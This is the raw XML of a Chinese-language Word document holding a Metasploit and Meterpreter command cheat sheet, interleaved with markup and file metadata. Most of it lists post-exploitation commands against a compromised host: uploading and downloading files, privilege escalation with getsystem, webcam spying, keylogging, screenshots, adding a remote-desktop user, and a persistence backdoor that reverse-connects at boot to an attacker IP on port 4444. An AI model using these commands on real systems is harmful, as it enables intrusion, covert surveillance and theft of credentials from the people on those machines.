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Back：返回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Connect：远程连接主机，主要用于内网渗透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Jobs：查看目前msfconsole上存在哪些任务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Kill：终止某任务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Search：查找模块，漏洞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Set：用以配置模块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Unset：重新设置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Setg：全局更改，配置完后，永久保存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Payload：攻击模块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Show：显示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Use：使用某模块</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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color w:val="0000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FF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Meterpreter：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background#返回，把meterpreter后台挂起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bglist#提供所有正在运行的后台脚本的列表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sessions -i number # 与会话进行交互，number表示第n个session,使用session -i 连接到指定序号的meterpreter会话已继续利用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close# 关闭通道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interact id #切换进一个信道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run#执行一个已有的模块，这里要说的是输入run后按两下tab，会列出所有的已有的脚本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getwd 或者pwd # 查看当前工作目录  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ls  #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Cd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mkdir lltest2  #只能在当前目录下创建文件夹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rmdir lltest2  #只能删除当前目录下文件夹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getlwd   或者 lpwd   #操作攻击者主机 查看当前目录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lcd /tmp   #操作攻击者主机 切换目录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cat c:\\lltest\\lltestpasswd.txt  # 查看文件内容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upload /tmp/hack.txt C:\\lltest  # 上传文件到目标机上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download c:\\lltest\\lltestpasswd.txt /tmp/ # 下载文件到本机上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edit c:\\1.txt #编辑或创建文件  没有的话，会新建文件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getsystem       #会自动利用各种各样的系统漏洞来进行权限提升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getuid           #查看对方正在运行的用户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ps              #列出所有的进程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getpid          #返回运行meterpreter的id号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sysinfo         #产看系统信息和体系结构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shell           #切换到cmd的系统权限方式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exit           #退出shell会话返回meterpreter或终止meterpreter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getdesktop    截取目标主机当前桌面会话窗口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run webcam -p /var/www    #在/var/www目录监控目标主机的摄像头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keylog_recorder   #使用migrate将会话迁移至explorer.exe的进程空间后记录键盘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后门植入：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run persistence –h  #查看帮助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run persistence -X -i 5 -p 4444 -r 192.168.1.159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#-X指定启动的方式为开机自启动；-i反向连接的时间间隔；–r 指定攻击者的ip</w:t>
      </w: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远控：</w:t>
      </w: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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>run getgui -e #开启远程桌面</w:t>
      </w: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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>run getgui -u user1 -p 123   #添加用户</w:t>
      </w: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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>run getgui -f 4444 –e   #3389端口转发到6661</w:t>
      </w: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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>enumdesktops  #查看可用的桌面</w:t>
      </w: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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>getdesktop    #获取当前meterpreter 关联的桌面</w:t>
      </w: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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>set_desktop   #设置meterpreter关联的桌面  -h查看帮助</w:t>
      </w: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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>screenshot  #截屏</w:t>
      </w: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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>use espia  #或者使用espia模块截屏  然后输入screengrab</w:t>
      </w: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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>run vnc  #使用vnc远程桌面连接，这方法有点问题，上传了exe但是启动不了</w:t>
      </w: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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>keyscan_start  #开始键盘记录</w:t>
      </w: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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>keyscan_dump   #导出记录数据</w:t>
      </w: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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>keyscan_stop #结束键盘记录</w:t>
      </w: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0NTY0MDYzMGY3NmRkZDNjOTk3ZDAxYjI3MDRhYzEifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="008027E9"/>
    <w:rsid w:val="0E29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709</Words>
  <Characters>1341</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>11</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1539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2022-12-26T11:17:00Z</dcterms:created>
  <dc:creator>86132</dc:creator>
  <cp:lastModifiedBy>羽小洛</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-05T03:07:41Z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221B1E5887534AE4B6979A1CA98374CD</vt:lpwstr>
  </property>
</Properties>
</file>